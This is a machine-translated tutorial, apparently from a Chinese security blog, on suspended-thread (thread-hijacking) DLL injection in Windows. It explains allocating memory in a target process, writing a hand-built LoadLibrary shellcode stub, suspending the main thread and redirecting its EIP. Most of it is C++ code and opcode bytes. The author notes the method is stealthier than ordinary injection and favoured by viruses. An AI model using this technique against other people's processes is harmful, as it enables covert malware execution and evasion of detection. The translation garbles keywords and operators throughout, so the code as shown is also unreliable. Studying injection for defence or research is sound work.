Inject understanding of suspended threads

0x00 Suspend Thread Injection principle
1. Mainly shellcode after the injection process to let him after acquiring the thread context, modify to the shellcode where we write (modify the EIP to Shellcode address)
2. Meaning A->b B does the operation at giving a
Get thread up and down background text
Ret = GetThreadContext (Threadhandle, &oldcontext);
if (Ret==false)
{
MessageBox ("GetThreadContext failed");
Return
}
Newcontext = Oldcontext;

Meaning A->b B does the operation at giving a
#ifdef _win64
Newcontext.rip = (DWORD) allocbuffer;
Oldeip = Newcontext.rip;
#else
Newcontext.eip = (DWORD) allocbuffer;//the next instruction to the requested memory space
Oldeip = Newcontext.eip;
#endif

; Point the pointer to the address in the first sentence of Shellcode, push 12345678h, and write the return address
Ret = WriteProcessMemory (ProcessHandle, ((char*) allocbuffer) + 1, &oldeip, sizeof (DWORD), NULL);
if (! Ret)
{RETURN;}
3.shellcode Construction
The idea of this injection approach: first write our shellcode to the target program, such as write Loadlibry to load our DLL. Then put the target process when the main thread hangs, then get the thread context, modify the EIP in the thread context to execute the code at the Shellcode where we write, and then set the thread to the original context • Continue execution and release the request space in the target after execution completes.

The concrete programming realizes the approximate realization idea:
Construction Shellcode
VirtualAllocEx request space in the target process, writeprocessmemory write Shellcode
Getting the target main thread through a thread snapshot
Openthread Open thread, SuspendThread suspend thread
GetThreadContext getting the target main thread context
SetThreadContext modifies the target main thread context to execute at the Shellcode we write
ResumeThread recovery line Chengyang shellcode execution
VirtualFreeEx Mop up space

In fact, the idea of suspending thread injection is actually quite simple, and this way, compared to the regular DLL injection, the concealment is higher, some viruses also prefer this way.
The detailed implementation steps are described below.

0X01 hangs a detailed programmatic implementation of thread injection
Because this injection method to inject shellcode, with C + + implementation is a bit cumbersome because to buckle binary, I also use a version of the assembly, in the attachment, here or in C + +
? Shellcode construction, loudlibrary load DLL
Structure must be byte aligned 1
#pragma pack (1)
typedef struct _INJECT_CODE
{
BYTE Bypush;
DWORD Dwpush_value;
BYTE BYPUSHFD;
BYTE Bypushad;
BYTE Bymov_eax; mov eax, addr Szdllpath
DWORD Dwmov_eax_value;
BYTE Bypush_eax; Push EAX
BYTE bymov_ecx; mov ecx, LoadLibrary
DWORD Dwmov_ecx_value;
WORD wcall_ecx; Call ECX
BYTE Bypopad;
BYTE BYPOPFD;
BYTE Byretn;
CHAR Szdllpath[max_path];
}inject_code, *pinject_code;
#pragma pack ()

The use of C + + injection does not have to consider the problem of relocation, because C + + provides OFFSETOF macros can be used to calculate the variable offset, but in the assembly implementation of the need to consider the offset of the variable, such as

In fact, in this injection method, the most learning significance is the structure of shellcode, I summed up some of the knowledge I learned in the construction of shellcode points.
Code Relocation
In the target process, to realize the difficulty of API call is actually to pass parameters, because our injection program and the target process in the base address is not the same, so it is doomed to write the parameter is not the same, which involves the relocation problem.
The classic relocation code.
Call $+5; Put the address of the next line into the stack to get the address of the next line of the target process
FIXADDR: This is the address lable in the injection process, which is used to find the difference
The address of the target process in which the stack is to be popped.
Sub ebp,fixaddr; Finding the address difference between the target process and the injection process

The address difference between the target process and the injection process is obtained, and we can access the address where we write the variable.

Release issues
Be sure to wait for all shellcode to complete and then free up space, otherwise there will be synchronization problems, causing the target program to crash.
? open process, write shellcode
Open process
g_hprocess = OpenProcess (process_all_access, FALSE, m_dwpid);

if (!g_hprocess)
{
MessageBox ("OpenProcess failed");
Return
}

G_lpbuffer=virtualallocex (G_hprocess,null,0x1000,mem_commit,page_execute_readwrite);
if (!g_lpbuffer)
{
MessageBox ("VirtualAllocEx failed");
Return
}

Assigning values to Shellcode structures
Ic.bypush= 0x68;
Ic.dwpush_value= 0x12345678;
Ic.bypushfd= 0x9c;
Ic.bypushad= 0x60;
Ic.bymov_eax= 0xb8;
Ic.dwmov_eax_value = (DWORD) G_lpbuffer + offsetof (Inject_code, Szdllpath);
Ic.bypush_eax= 0x50;
Ic.bymov_ecx= 0xb9;
Ic.dwmov_ecx_value = (DWORD) &LoadLibrary;
Ic.wcall_ecx= 0xd1ff;
Ic.bypopad= 0x61;
Ic.bypopfd= 0x9d;
Ic.byretn= 0xC3;
memcpy (Ic.szdllpath, M_strdllpath.getbuffer (0), m_strdllpath.getlength ());

Write Shellcode
BRet = WriteProcessMemory (g_hprocess, G_lpbuffer, &ic, sizeof (IC), NULL);
if (!bret)
{
MessageBox ("Write Memory Failed");
Return
}

Create thread snapshot Find target program main thread
Create thread snapshot Find target program main thread
te32.dwsize = sizeof (TE32);
Hthreadsnap = CreateToolhelp32Snapshot (th32cs_snapthread, 0);
if (Hthreadsnap = = INVALID_HANDLE_VALUE)
{
MessageBox ("CreateToolhelp32Snapshot failed");
Return
}

Traverse query target program main thread ID
if (Thread32first (Hthreadsnap, &te32))
{
Do
{
if (m_dwpid = = Te32.th32ownerprocessid)
{
dwThreadID = Te32.th32threadid;
Break
}
} while (Thread32next (Hthreadsnap, &te32));
}

④ Open and suspend the target main thread, get the thread context, modify the address of the EIP to Shellcode
Suspend Target main thread
BRet = SuspendThread (hthread);

if (BRet = =-1)
{
MessageBox ("SuspendThread failed");
Return
}

Oldcontext.contextflags = Context_full;
BRet = GetThreadContext (Hthread, &oldcontext);
if (!bret)
{
MessageBox ("GetThreadContext failed");
Return
}
Newcontext = Oldcontext;

Newcontext.eip = (DWORD) g_lpbuffer;

; Point the pointer to the address in the first sentence of Shellcode, push 12345678h, and write the return address
BRet = WriteProcessMemory (G_hprocess, ((char*) g_lpbuffer) + 1, &oldcontext.eip, sizeof (DWORD), NULL);
if (!bret)
{
MessageBox ("Write Memory Failed");
Return
}

⑤ set context, recovery thread run up
BRet = SetThreadContext (Hthread, &newcontext);

if (!bret)
{
MessageBox ("SetThreadContext failed");
Return
}

and run the main thread.
BRet = ResumeThread (hthread);

if (BRet = =-1)
{
MessageBox ("ResumeThread failed");
Return
}

⑥ mop up work, set up a separate function to clear the target process of the application of space, note that this operation must wait for our shellcode execution, or it will cause the target program to crash
if (! VirtualFreeEx (g_hprocess, G_lpbuffer, 0, Mem_release))
{
MessageBox ("VirtualFreeEx failed");
Return
}

MessageBox ("Free space for each other");

Detailed source code see annex

The experimental results are as follows: DLL injection succeeded

Inject understanding of suspended threads